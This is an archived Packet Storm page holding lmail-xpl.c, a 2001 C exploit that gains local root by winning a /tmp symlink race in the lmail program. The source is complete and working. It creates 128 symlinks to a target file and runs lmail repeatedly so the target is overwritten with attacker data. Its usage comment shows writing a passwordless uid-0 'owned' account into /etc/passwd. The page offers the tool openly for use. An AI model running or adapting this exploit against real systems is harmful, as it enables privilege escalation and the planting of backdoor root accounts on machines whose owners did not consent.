what you don't know can hurt you

lmail-xpl.c

lmail-xpl.c
Posted Jul 12, 2001
Authored by Charles Stevenson

lmail local root exploit. Simply run it with the file you want to create/overwrite and the data you wish to place in the file.

tags | exploit, local, root
MD5 | 7f9da8c5028c2fd49aa9c8210d25ec8d

lmail-xpl.c

Change Mirror Download
/* For more information see http://www.securityfocus.com/archive/1/195022 */


/* lmail-xpl.c
*
* Quick hack to exploit lmail
*
* Simply run it with the file you want to create/overwrite
* and the data you wish to place in the file.
*
* Example:
*
* $ gcc -g -Wall lmail-xpl.c -o lmail-xpl
* $ ./lmail-xpl /etc/passwd owned::0:0::/root:/bin/bash
*
* Then login as owned... etc..
*
* by Charles Stevenson <core@ezlink.com>
*
* July 04 2001
*
* shoutz b10z
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 128

void usage(char*);

int main(int argc, char **argv){
char tempfile[128] = TEMPFILE;
int fd, i;
pid_t pid;
char temp[512];

if (argc < 3){
usage(argv[0]);
}

if((fd = mkstemp(tempfile))==-1){
fprintf(stderr, "Error creating %s!\n",tempfile);
exit(1);
}

/* begin lazy slacker coding */
fprintf(stderr, "lmail-xpl.c by core (c) 2001\n");
fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

/* backup old file */
sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
system(temp);

/* set the date/time */
sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
system(temp);

pid = getpid();

fprintf(stderr, "> creating a lot of symlinks\n");

for (i=0;i<BRUTE;i++){
sprintf(temp, "/tmp/lmail%d", pid+i);
symlink(argv[1], temp);
}

sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s | lmail -f\n", argv[2]);
fprintf(stderr, "Running a few times since I'm lazy.\n");
for (i=0;i<BRUTE;i++){
system(temp);
//sleep(1);
}

sprintf(temp, "/bin/ls -l %s", argv[1]);
system(temp);

fprintf(stderr, "> cleaning up\n");
sprintf(temp, "/bin/rm -f /tmp/lmail*; /bin/rm -f /tmp/ez.*");
system(temp);

fprintf(stderr, "All done. Enjoy!\n");
return 0;
}

void usage(char *name){

fprintf(stderr, "usage: %s <filename> <data>\n", name);
exit(1);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close